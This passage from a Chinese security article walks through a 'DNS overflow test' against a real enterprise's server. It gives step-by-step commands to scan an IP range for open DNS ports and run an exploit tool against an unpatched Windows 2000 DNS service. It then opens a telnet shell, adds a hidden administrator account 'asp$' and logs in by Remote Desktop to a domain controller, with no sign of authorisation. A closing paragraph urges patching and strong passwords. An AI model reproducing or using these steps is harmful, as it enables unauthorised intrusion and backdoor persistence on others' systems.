二、DNS溢出测试
1.缘由:
DNS溢出漏洞是去年微软的一个高危漏洞,攻击者通过该漏洞可以溢出获得一个shell,进而控制这台服务器。一年过去了,还有存在该漏洞的服务器吗?
2.测试:
笔者以某企业网站的IP为中心进行测试。
第一步:先看看该网站Web服务器的IP地址,打开命令提示符,敲入如下命令:ping www.*.com,得知ip地址为:202.2##.*.196。
第二步:以202.2##.*.196为中心确定一个IP段,在命令行下用S扫描器扫描开放了53端口(DNS端口)的服务器。对扫描结果中的IP逐个进行溢出测试,经过一次次的测试找到了一个存在DNS溢出的IP。在命令行下敲入如下命令:dns -s 202.2##.*.196,显示如图4。(图4)
说明:服务器采用的是windows 2000,在1052端口存在DNS溢出漏洞。
第三步:继续在命令行下,敲入如下命令:dns -t2000all 202.2##.*.196 1052 显示如图5。(图5)
第四步:重新打开另外一个命令提示符,敲入命令:telnet
第五步:在Telnet命令提示符下敲入命令:net user asp$ "test" /add
net localgroup administrators asp$ /add,建立一个具有管理员权限的asp$账户,密码为“test”。在本机运行“mstsc”,打开“远程桌面连接工具”,输入IP地址:202.2##.*.196,用户名:asp$
密码:test,连接成功如图7。(图7)
第六步:打开“管理工具”,发现这台主机还是一个域控制器,打开“域用户和计算机”,域成员竟然有43511个如图8,看来这个企业的局域网的规模不小。(图8)
总结:一年前的漏洞到现在还没有打,管理员太失职了。
上面有关服务器的两例安全测试,虽是个案不具有普遍性,但其中反应出的管理员的疏忽大意及其安全意识淡薄是不容忽视的。笔者认为,作为企业服务器稳定高效固然重要,但安全更重要,没有了安全性其他都无从谈起。就让我们从为服务器打好补丁,设置健壮的密码开始,全方位地打造安全的服务器。